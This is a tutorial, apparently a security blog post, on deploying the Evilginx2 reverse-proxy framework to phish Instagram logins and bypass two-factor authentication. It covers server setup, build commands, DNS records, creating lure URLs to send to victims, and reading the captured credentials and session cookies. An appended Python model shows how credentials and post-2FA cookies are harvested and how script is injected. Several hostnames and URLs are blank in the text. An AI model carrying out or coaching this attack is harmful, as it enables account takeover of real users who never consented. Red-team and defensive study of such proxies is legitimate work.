MITM: Bypassing 2FA with Advanced Level Phishing Framework

by hash3liZer . 23 May 2019


Phishing is a class of fraudulent attacks whose goal is to obtain something from a user (credentials, a session, a signature) or to coerce the user into performing some unintended action. The attack works by showing the user a forged copy of a document or site they are already used to, while that copy is controlled by the attacker.

This is where Evilginx2 comes into the picture. It is a reverse-proxy framework that stands between the user and the original website.

The server acts as a reverse proxy: it takes requests from the user, forwards them to the original site, takes the site's response and hands it back to the user. Standing in the middle, we can not only capture the requests and responses but alter them as needed, to the point of injecting our own JavaScript into the pages the user sees.


Evilginx2 is a proxying MITM framework designed for penetration-testing and red-teaming 💀 purposes. It hosts a web server on the backend where the actual proxying happens. Its foremost feature is phishlets: YAML configuration files that describe the target website (which hosts to proxy, which cookies make up a session, where credentials are posted).


Creating The Environment

First we need a server and a domain name to map the Evilginx2 services to. For the domain, since we are not building an official site, any test domain will do; at the time of writing, Freenom was the best-known service for free domains. Sign up and register a new domain name.


Then we need a server where everything will be proxied. Go to the DigitalOcean website and create a new Ubuntu droplet on the minimum $5 plan. You are only charged for the time the droplet exists: destroy it once you have finished and the charges apply to that period only.

You will be sent an email with your droplet password. When you have both, log in to the server over SSH. Copy the IP address and log in directly to the root account:

$ ssh root@

(screenshot: SSH session on the droplet)

You will be prompted to set a new password before you can use the server.



Coming to the installation: Evilginx2 is written in Go, so we need the Go toolchain to compile its source. First update the package index and install the necessary packages:

$ sudo apt update
$ sudo apt install git make wget


Once those are installed, download the Go distribution directly from the internet using wget:

$ wget

Extract the Go binaries and place them under /usr/local/:

$ tar -C /usr/local -xzf go1.10.linux-amd64.tar.gz

Next, set up a temporary Go environment for the commands that follow. These exports only last for the current shell session; add them to ~/.profile if you want them to persist. Copy and paste the following two commands into your terminal:

$ export GOPATH=$HOME/go
$ export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Now fetch the evilginx2 repository from GitHub using go get:

$ go get -u

This clones the repository into the Go workspace under your home directory. Move into that directory:

$ cd $GOPATH/src/

Finally, compile the evilginx2 sources and make sure the resulting binary is executable. The execute bit is all that is needed here; chmod 777, which is often suggested, would also make the file world-writable for no reason:

$ make
$ go build main.go
$ chmod +x main

Optionally, create symbolic links to the compiled binary and to the phishlets directory, so you can run the tool from any directory:

$ ln -s /root/go/src/ /usr/bin/evilginx2
$ ln -s /root/go/src/ /root/phishlets

Then run it directly from the terminal:

$ sudo evilginx2



Evilginx2 Configuration

Now comes the configuration part, where we use a phishlet to capture user credentials on our server. Let our target be Instagram. Suppose you have obtained a domain from Freenom by the name "". On the evilginx2 terminal, first set the domain and IP configuration:

$ config domain
$ config ip

where ip is the address of the server you are working on. Since we are creating a phishing site for Instagram, we need a hostname under our domain through which all of the user's traffic will be relayed to the original site. Let the hostname for Instagram under our fake domain be "". Set the hostname for the phishlet:

$ phishlets hostname instagram

Here instagram refers to the name of the phishlet located in the /root/phishlets directory. You can list all available phishlets by typing:

$ phishlets



DNS Setup

Now we configure the DNS records for our domain. To know exactly which subdomains to add, enable the phishlet; it will fail with DNS resolution errors that list them:

$ phishlets enable instagram


The errors show the hostnames that failed to resolve. Now set up the DNS records. First point the apex (root) domain and the www subdomain at the server IP address with A records:

(screenshot: A records for the apex domain and www)

Then, for each subdomain listed in the error (2 in our case), create a CNAME record pointing to the apex domain registered above. The final records will look something like this:

(screenshot: final DNS records, A records plus CNAMEs for the phishlet subdomains)


Push the Phishlet on Internet

Wait a few minutes for the DNS changes to propagate (you can confirm with dig or nslookup from another machine), then re-enable the Instagram phishlet:

$ phishlets enable instagram

(screenshot: phishlet enabled)

Once the phishlet is up and running, we need a URL to send to the user, from which they will be redirected to our proxied site. Evilginx2 provides a separate command for this, and you can create more than one redirection URL (lure) at a time. Spawn a new one:

$ lures create instagram

This prints the id assigned to the newly created lure. You can view all lures by typing the lures command on its own:

$ lures

To get the URL for a specific id (0 is the id assigned to the lure created for Instagram above), type:

$ lures get-url 0

(screenshot: generated phishing URL)



Now for the exploitation part. Copy the URL from the last command and send it to a user. On the victim's side, opening the URL shows the Instagram login page, which looks exactly like the original because it is the original, relayed through our server. If you manage to get the target to log in through that page, you will be notified on the evilginx2 terminal.

You will see the successful login from that user in the form of both credentials and session cookies. Because the cookies are issued by the real site after the user has completed the second factor, replaying them gives access to the account without needing the password or the 2FA code again. Here's what it looks like:

(screenshot: captured credentials)

To see all the captured sessions:

$ sessions

And for a specific session:

$ sessions [ID]

(screenshot: captured session with cookies)


Designing New Phishlets

By now you should have an idea of what Evilginx2 does and how it works. You may be looking for sites that are not covered by the phishlets shipped with the current version. This is where phishlets come in handy: why not create your own? They are simple YAML configuration files.

All you need to know is which requests to intercept and which ones to redirect. For a complete guide on creating your own phishlet from scratch, refer to the Phishlet File Format Guide (2.3.0). Afterwards you can upload them to the server over SFTP (or scp).
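To make concrete what the proxy described earlier does with the information a phishlet carries (which hosts to relay, which POST fields hold the credentials, which cookies make up a session, what script to inject), here is an added example in Python. It is not Evilginx2's code and not a phishlet; it is a small model of the same logic, driven by a hypothetical phishlet-like dict for a fictional site (www.example.com proxied through www.phish.test) and run over a constructed login exchange. The field names echo what a real phishlet declares but not its YAML syntax.

```python
# Model of what an Evilginx2-style reverse proxy does with one phishlet.
# Added example for this article, not Evilginx2's own code. The target site
# (www.example.com proxied through www.phish.test) and the phishlet dict are
# hypothetical; its keys echo what a real phishlet declares (proxy hosts,
# auth tokens, credentials, login path) but not the real YAML syntax.
import re
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

PHISHLET = {
    "domain": "example.com",        # real site's registered domain (assumed)
    "phish_domain": "phish.test",   # attacker-controlled domain (assumed)
    "proxy_hosts": ["www", "api"],  # subdomains proxied one-to-one
    # cookies that together make a logged-in session, keyed by cookie domain
    "auth_tokens": {".example.com": ["sessionid", "csrftoken"]},
    # POST form fields that carry the username and password
    "credentials": {"username": "username", "password": "password"},
    "login": {"domain": "www.example.com", "path": "/accounts/login/"},
}
PHISH_HOSTS = {f"{s}.{PHISHLET['phish_domain']}": f"{s}.{PHISHLET['domain']}"
               for s in PHISHLET["proxy_hosts"]}
# attacker-controlled script added to every proxied HTML page (assumed)
JS_INJECT = '<script>console.log("injected by proxy")</script>'

def _swap(text, src, dst):
    # rewrite src only where it starts a hostname label: "www.example.com"
    # and ".example.com" change, "notexample.com" is left alone
    return re.sub(r"(?<![\w-])" + re.escape(src), dst, text)

def to_orig(text):   # victim-facing names -> real names (request direction)
    return _swap(text, PHISHLET["phish_domain"], PHISHLET["domain"])

def to_phish(text):  # real names -> victim-facing names (response direction)
    return _swap(text, PHISHLET["domain"], PHISHLET["phish_domain"])

def proxy_request(host, path, headers, body, session):
    """Victim -> proxy -> real site; returns (upstream host, headers, body).
    Form fields posted to the phishlet's login path are copied into session."""
    upstream = PHISH_HOSTS[host]              # KeyError: host is not proxied
    out = {k: to_orig(v) for k, v in headers.items()}
    out["Host"] = upstream
    login = PHISHLET["login"]
    if upstream == login["domain"] and path == login["path"]:
        form = parse_qs(body)
        for label, field in PHISHLET["credentials"].items():
            if field in form:
                session["creds"][label] = form[field][0]
    return upstream, out, to_orig(body)

def proxy_response(orig_host, headers, body, session):
    """Real site -> proxy -> victim; returns (headers, body) for the victim.
    headers is a list of (name, value) pairs because Set-Cookie may repeat.
    Cookies named in auth_tokens are recorded on the way through; the victim
    still receives them, so the real login flow is never disturbed."""
    wanted = PHISHLET["auth_tokens"]
    out, content_type = [], ""
    for name, value in headers:
        if name.lower() == "set-cookie":
            jar = SimpleCookie()
            jar.load(value)
            for key, morsel in jar.items():
                cookie_domain = morsel["domain"] or orig_host
                if key in wanted.get(cookie_domain, []):
                    session["tokens"][key] = morsel.value
        elif name.lower() == "content-type":
            content_type = value
        out.append((name, to_phish(value)))   # Location, cookie Domain, ...
    body = to_phish(body)
    if content_type.startswith("text/html") and "</body>" in body:
        body = body.replace("</body>", JS_INJECT + "</body>")
    return out, body

def session_captured(session):
    """True once every cookie listed under auth_tokens has been seen. This is
    the 2FA bypass: password and one-time code are relayed untouched, and the
    cookies the site issues afterwards are simply kept for replay."""
    needed = {k for keys in PHISHLET["auth_tokens"].values() for k in keys}
    return needed <= set(session["tokens"])

def demo():
    """Constructed exchange: password login, 2FA challenge, final session."""
    session = {"creds": {}, "tokens": {}}
    # 1. victim submits the password form to the phishing host
    proxy_request("www.phish.test", "/accounts/login/",
                  {"Host": "www.phish.test", "Origin": "https://www.phish.test"},
                  "username=alice&password=hunter2", session)
    # 2. real site answers with a CSRF cookie and a redirect to its 2FA page
    proxy_response("www.example.com", [
        ("Set-Cookie", "csrftoken=c5rf; Domain=.example.com; Path=/; Secure"),
        ("Location", "https://www.example.com/challenge/")], "", session)
    half_way = session_captured(session)      # False: no sessionid yet
    # 3. victim enters the one-time code; the proxy relays it unchanged and
    #    the real site sets the cookie that represents the authenticated session
    proxy_request("www.phish.test", "/challenge/", {"Host": "www.phish.test"},
                  "code=123456", session)
    hdrs, body = proxy_response("www.example.com", [
        ("Set-Cookie", "sessionid=s3ss10n; Domain=.example.com; Path=/; HttpOnly"),
        ("Content-Type", "text/html"),
        ("Location", "https://www.example.com/")],
        "<html><body>Welcome alice</body></html>", session)
    return session, half_way, dict(hdrs), body
```

Running demo() shows the three things the article relies on: the password is captured at the login POST, the session is not complete after the first redirect because the 2FA step has not happened yet, and it becomes complete as soon as the real site issues its post-2FA cookie, which the proxy rewrites (Domain=.phish.test) for the victim while keeping the original value for itself. A real phishlet expresses the same hostname, cookie and credential rules in YAML, and Evilginx2 does the rewriting and harvesting for you.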


MITM attacks are not limited to local networks. In fact, it is entirely possible that someone is already proxying your website. Evilginx2 is an excellent MITM framework that lets us explore the real consequences of such proxied attacks. And with the ability to inject JavaScript, an attacker can do most of what the site itself can do, effectively becoming part of the website.